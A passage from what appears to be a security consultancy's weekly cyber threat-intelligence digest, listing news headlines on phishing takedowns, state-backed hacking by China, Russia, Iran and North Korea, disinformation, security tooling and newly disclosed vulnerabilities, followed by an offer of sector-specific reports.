It’s Never Too Late: Transitioning to a Career in Cyber Security - IT Security Guru

Future-proofing cyber security: Why talent development is key - Help Net Security

Round-the-Clock Cyber Coverage Lacking in Many Orgs | MSSP Alert

Cyber security Skills Gap Leaves Cloud Environments Vulnerable - Infosecurity Magazine (infosecurity-magazine.com)

Law Enforcement Action and Take Downs

Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)

This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)

Telegram Agrees to Share User Data with Authorities for Criminal Investigations (thehackernews.com)

Employee arrested over Islamophobic cyber attack on public WiFi at major UK railway stations (nationalworld.com)

US indicts two over socially engineered $230M+ crypto heist • The Register

Risk & Repeat: What's next for Telegram and Pavel Durov? | TechTarget

Telegram CEO Pavel Durov will hand over data to government (nypost.com)

FBI raids government IT and cyber contractor Carahsoft - Nextgov/FCW

Arrests made after $243 million stolen from one individual in Gemini phishing attack (web3isgoinggreat.com)

Misinformation, Disinformation and Propaganda

Fake UK news sites ‘spreading false stories’ about western firms in Ukraine | Russia | The Guardian

How Russia, China & Iran Are Targeting US Elections (darkreading.com)

China are the real hackers not us, Taiwan says after cyber accusations, Asia News - AsiaOne

Iranian-linked election interference operation shows signs of recent access | CyberScoop

Officials: Fake Kamala Harris Videos Part of Russian Influence Operations | MSSP Alert

China urges vigilance against Taiwanese cyber attacks - CNA (channelnewsasia.com)


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Developing an effective cyber warfare response plan - Help Net Security

Volt Typhoon: The real end game of evolving nation-state threats - SiliconANGLE

The Supply Chain Conspiracy: Cyber Attacks Behind the Lebanon Explosions - Security Boulevard

Nation State Actors

Ban Sought for Chinese, Russian Software and Hardware Used in Autonomous Vehicles on US Roads - SecurityWeek

Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)

How Russia, China & Iran Are Targeting US Elections (darkreading.com)

China

US ISPs targeted by new Chinese cyber espionage gang | SC Media (scworld.com)

China's Salt Typhoon cyber spies spotted deep inside US ISPs • The Register

Chinese hackers allegedly hacked US ISPs for cyber espionage | CSO Online

Noise Storms: Massive Amounts of Spoofed Web Traffic Linked to China - SecurityWeek

China's 'Salt Typhoon' Cooks Up Cyber Attacks on US ISPs (darkreading.com)

Chinese APT Earth Baxia target APAC by exploiting GeoServer flaw (securityaffairs.com)

Noise Storms: Mysterious massive waves of spoofed traffic observed since 2020 (securityaffairs.com)

China are the real hackers not us, Taiwan says after cyber accusations, Asia News - AsiaOne

China urges vigilance against Taiwanese cyber attacks - CNA (channelnewsasia.com)

Russia

Fake UK news sites ‘spreading false stories’ about western firms in Ukraine | Russia | The Guardian

Ukraine bans Telegram for government agencies, military, and critical infrastructure (securityaffairs.com)

Russia-backed Gamaredon still ‘most engaged’ hacker group in Ukraine (therecord.media)

Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing (securityintelligence.com)

Ukraine sees shift in Russian hacking tactics: more widespread, less severe | Cybernews

Russian Cyber-Attacks Home in on Ukraine’s Military Infrastructure - Infosecurity Magazine (infosecurity-magazine.com)

Russian hackers have shifted tactics in third year of war, Ukraine cyber agency says (therecord.media)

Officials: Fake Kamala Harris Videos Part of Russian Influence Operations | MSSP Alert

Why so many hackers are Russian | Cybernews

Why so many hackers are Russian: Vol 2 | Cybernews

Russia clings to malware as attacks on Ukraine persist • The Register

Why Russia is a Hotbed of Cyber Crime | Intel471

Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks (thehackernews.com)

Kaspersky deletes itself, installs UltraAV antivirus without warning (bleepingcomputer.com)

Austria subjected to pro-Russian DDoS intrusions | SC Media (scworld.com)

Iran

UNC1860 provides Iran-linked APTs with access to Middle Eastern networks (securityaffairs.com)

Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)

Concealed Fox Kitten infrastructure exposed | SC Media (scworld.com)

Sweden blames Iran for cyber-attack after Quran-burnings - BBC News

Iranian-linked election interference operation shows signs of recent access | CyberScoop

North Korea

Mandiant gives tips on catching North Korean IT operatives • The Register

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Did Israel infiltrate Lebanese telecoms networks? (securityaffairs.com)

ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)


Tools and Controls

Preparing to fail is a vital part of cyber security - Ian McGowan (scotsman.com)

AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru

Less Than Half of AI Users Trained on Security and (globenewswire.com)

Organisations are changing cyber security providers in wake of Crowdstrike outage - Help Net Security

MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security

Cloud Exit: 42% of Companies Move Data Back On-Premises - Techopedia

Why threat intelligence is essential to consolidated security | SC Media (scmagazine.com)

Mastercard's Bet on Recorded Future a Win for CTI (darkreading.com)

The AI-Cyber Security Paradox: How AI Is Revolutionizing Defences While Empowering Hackers (informationsecuritybuzz.com)

New cyber security advisory highlights defence-in-depth strategies (securityintelligence.com)

Combating phishing attacks through awareness and simulation | Cybernews

Microsoft confesses it's still falling behind on cyber security, but says it is working on improving | TechRadar

Developing an effective cyber warfare response plan - Help Net Security

Active Directory compromise: Cyber Security agencies provide guidance - Help Net Security

Keep Tier-One Applications Out of Virtual Environments (darkreading.com)

Boredom Is the Silent Killer in Your IT Systems (darkreading.com)

When technical debt strikes the security stack | CSO Online

What Does Platformization Mean for MSSPs and MDRs? | MSSP Alert

What Is Cyber Threat Hunting? (techrepublic.com)

Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)

65% of websites are unprotected against simple bot attacks - Help Net Security

CrowdStrike exec to apologize for faulty update that caused global IT outage (yahoo.com)

Securing non-human identities: Why fragmented strategies fail - Help Net Security

Kaspersky users shocked by automatic antivirus replacement without explicit permission | Cybernews

Offensive cyber operations are more than just attacks - Help Net Security

Privacy And API Security: What’s At Stake? (informationsecuritybuzz.com)

How automated red teaming can improve your cyber security | Tech Donut

Move over, Cobalt Strike, there's a new post-exploit tool • The Register



Other News

Microsoft confesses it's still falling behind on cyber security, but says it is working on improving | TechRadar

Small doesn’t mean safe: how SMEs are under attack (smh.com.au)

Digital security is everyone's concern – Daily Business Magazine (dailybusinessgroup.co.uk)

Microsoft Trims Cloud Cyber Attack Surface (darkreading.com)

How Microsoft Is Beefing Up Security With 34,000 Engineers (databreachtoday.co.uk)

Microsoft CEO to cyber team: Don’t tell me how great everything is | The Seattle Times

Are You Sabotaging Your Cyber Security Posture? - Security Boulevard

Nuclear vs cyber deterrence: why the UK should invest more in its cyber capabilities and less in nuclear deterrence | European Leadership Network

How realistic is new BBC thriller Nightsleeper? Cyber security expert picks apart five holes in 'hack-jack' train drama dubbed the 'new Bodyguard' | Daily Mail Online

Cyber security threats target healthcare - SiliconANGLE

Nightsleeper may be fiction but real-life cyber criminals keep showing how dangerous they are (scotsman.com)

Athletes, Arenas, and Cyber Attacks: The Evolving Landscape of Cyber Security in Sports | Wiley Rein LLP - JDSupra

ISO - Healthcare cyber security: Diagnosing risks, prescribing solutions

5 Cyber Security Threats Every Startup Should Know | LevelBlue (att.com)

Arkansas City water treatment facility switched to manual operations following a cyber attack (securityaffairs.com)

Google, Apple and the antitrust tipping point (ft.com)

10 security bugs put fuel storage tanks at risk of attacks • The Register

6 Cyber Security Headaches Sporting Events Suffer (darkreading.com)

A lesson in cyber threats: Building resilient networks in education | theHRD (thehrdirector.com)


Vulnerability Management

Microsoft ends development of Windows Server Update Services (WSUS) (bleepingcomputer.com)

Windows Server 2025 gets hotpatching option, without reboots - Help Net Security

Boredom Is the Silent Killer in Your IT Systems (darkreading.com)

When technical debt strikes the security stack | CSO Online

EPSS vs. CVSS: What's the Best Approach to Vulnerability Prioritization? (thehackernews.com)

60% of vulnerabilities were leveraged against Microsoft Exchange | Security Magazine

Vulnerabilities

Zero-Click MediaTek Bug Opens Phones, Wi-Fi to Takeover (darkreading.com)

Doomsday 9.9 unauthenticated RCE bug affects 'all Linux' • The Register

Critical Linux bug is CUPS-based remote-code execution hole • The Register

Cisco Patches High-Severity Vulnerabilities in IOS Software - SecurityWeek

Critical Ivanti vTM auth bypass bug now exploited in attacks (bleepingcomputer.com)

Third Recent Ivanti Vulnerability Exploited in the Wild - SecurityWeek

PoC for critical SolarWinds Web Help Desk vulnerability released (CVE-2024-28987) - Help Net Security

Citrix Releases Security Updates for XenServer and Citrix Hypervisor | CISA

HPE patches three critical flaws in Aruba software • The Register

New macOS Sequoia update reportedly not playing nice with VPNs and cyber security tools like CrowdStrike | Mashable

Researcher reveals ‘catastrophic’ security flaw in the Arc browser - The Verge

Versa Networks Releases Advisory for a Vulnerability in Versa Director, CVE-2024-45229 | CISA

CERT/CC Warns of Unpatched Critical Vulnerability in Microchip ASF - SecurityWeek

ESET Patches Privilege Escalation Vulnerabilities in Windows, macOS Products - SecurityWeek

Critical NVIDIA Container Toolkit Vulnerability Could Grant Full Host Access to Attackers (thehackernews.com)

FreeBSD Hypervisor Vulnerability Lets Attackers Execute Malicious Code (cybersecuritynews.com)

60% of vulnerabilities were leveraged against Microsoft Exchange | Security Magazine


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
